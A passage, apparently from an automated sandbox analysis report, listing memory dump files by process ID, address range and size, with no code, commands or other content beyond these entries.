4KB
-
memory/4436-612-0x0000000004BA3000-0x0000000004BA4000-memory.dmpFilesize
4KB
-
memory/4444-300-0x0000000000000000-mapping.dmp
-
memory/4448-171-0x0000000000000000-mapping.dmp
-
memory/4452-361-0x0000000004F40000-0x0000000005546000-memory.dmpFilesize
6.0MB
-
memory/4452-340-0x0000000000000000-mapping.dmp
-
memory/4488-123-0x000002469C550000-0x000002469C552000-memory.dmpFilesize
8KB
-
memory/4488-122-0x000002469C550000-0x000002469C552000-memory.dmpFilesize
8KB
-
memory/4504-167-0x0000000000000000-mapping.dmp
-
memory/4508-146-0x0000000000000000-mapping.dmp
-
memory/4528-439-0x0000000000000000-mapping.dmp
-
memory/4536-346-0x0000000005180000-0x0000000005181000-memory.dmpFilesize
4KB
-
memory/4536-312-0x0000000000000000-mapping.dmp
-
memory/4556-391-0x0000000000000000-mapping.dmp
-
memory/4572-180-0x0000000000000000-mapping.dmp
-
memory/4572-296-0x0000000000400000-0x00000000004D2000-memory.dmpFilesize
840KB
-
memory/4572-294-0x00000000004E0000-0x000000000062A000-memory.dmpFilesize
1.3MB
-
memory/4644-135-0x0000000000000000-mapping.dmp
-
memory/4700-423-0x0000000000000000-mapping.dmp
-
memory/4700-145-0x0000000000000000-mapping.dmp
-
memory/4704-222-0x0000000000690000-0x000000000073E000-memory.dmpFilesize
696KB
-
memory/4704-214-0x0000000000000000-mapping.dmp
-
memory/4712-260-0x0000000004D70000-0x0000000005376000-memory.dmpFilesize
6.0MB
-
memory/4712-244-0x0000000005380000-0x0000000005381000-memory.dmpFilesize
4KB
-
memory/4712-246-0x0000000001120000-0x0000000001121000-memory.dmpFilesize
4KB
-
memory/4712-250-0x0000000004E80000-0x0000000004E81000-memory.dmpFilesize
4KB
-
memory/4712-236-0x0000000000419336-mapping.dmp
-
memory/4712-235-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4760-206-0x00000000002C0000-0x00000000002C1000-memory.dmpFilesize
4KB
-
memory/4760-563-0x0000000004B20000-0x0000000004B21000-memory.dmpFilesize
4KB
-
memory/4760-219-0x0000000002640000-0x0000000002641000-memory.dmpFilesize
4KB
-
memory/4760-226-0x00000000026D0000-0x00000000026D1000-memory.dmpFilesize
4KB
-
memory/4760-202-0x0000000000000000-mapping.dmp
-
memory/4760-233-0x0000000005140000-0x0000000005141000-memory.dmpFilesize
4KB
-
memory/4792-560-0x00000000027C0000-0x00000000027C2000-memory.dmpFilesize
8KB
-
memory/4796-308-0x0000000000000000-mapping.dmp
-
memory/4796-348-0x0000000004F60000-0x0000000004F61000-memory.dmpFilesize
4KB
-
memory/4796-323-0x00000000007A0000-0x00000000007E5000-memory.dmpFilesize
276KB
-
memory/4832-179-0x0000000000400000-0x0000000000450000-memory.dmpFilesize
320KB
-
memory/4832-190-0x0000000000400000-0x0000000000450000-memory.dmpFilesize
320KB
-
memory/4832-181-0x000000000041616A-mapping.dmp
-
memory/4832-186-0x0000000000400000-0x0000000000450000-memory.dmpFilesize
320KB
-
memory/4848-277-0x0000000000400000-0x000000000053E000-memory.dmpFilesize
1.2MB
-
memory/4848-168-0x0000000000000000-mapping.dmp
-
memory/4848-276-0x0000000002230000-0x0000000002309000-memory.dmpFilesize
868KB
-
memory/4852-143-0x0000000000000000-mapping.dmp
-
memory/4864-397-0x0000000003F80000-0x00000000040CE000-memory.dmpFilesize
1.3MB
-
memory/4864-159-0x0000000000000000-mapping.dmp
-
memory/4876-161-0x0000000000000000-mapping.dmp
-
memory/4896-153-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4896-149-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4896-126-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/4896-130-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/4896-131-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/4896-129-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/4896-147-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4896-132-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/4896-144-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4896-128-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/4896-133-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/4896-127-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/4896-125-0x0000000000000000-mapping.dmp
-
memory/4912-162-0x0000000000000000-mapping.dmp
-
memory/4928-394-0x0000000004020000-0x000000000416E000-memory.dmpFilesize
1.3MB
-
memory/4928-157-0x0000000000000000-mapping.dmp
-
memory/5000-192-0x000000001B980000-0x000000001B982000-memory.dmpFilesize
8KB
-
memory/5000-166-0x0000000000170000-0x0000000000171000-memory.dmpFilesize
4KB
-
memory/5000-151-0x0000000000000000-mapping.dmp
-
memory/5024-411-0x0000000000000000-mapping.dmp
-
memory/5072-266-0x0000000000000000-mapping.dmp
-
memory/5072-269-0x0000000000400000-0x00000000004CC000-memory.dmpFilesize
816KB
-
memory/5096-293-0x0000000000000000-mapping.dmp
-
memory/5528-759-0x00000000035D0000-0x0000000003619000-memory.dmpFilesize
292KB
-
memory/5528-779-0x0000000000400000-0x0000000003243000-memory.dmpFilesize
46.3MB
-
memory/5540-762-0x0000000003380000-0x00000000034CA000-memory.dmpFilesize
1.3MB
-
memory/5540-781-0x0000000000400000-0x0000000003243000-memory.dmpFilesize
46.3MB
-
memory/5804-616-0x0000000005670000-0x0000000005671000-memory.dmpFilesize
4KB
-
memory/5804-581-0x0000000002B30000-0x0000000002B75000-memory.dmpFilesize
276KB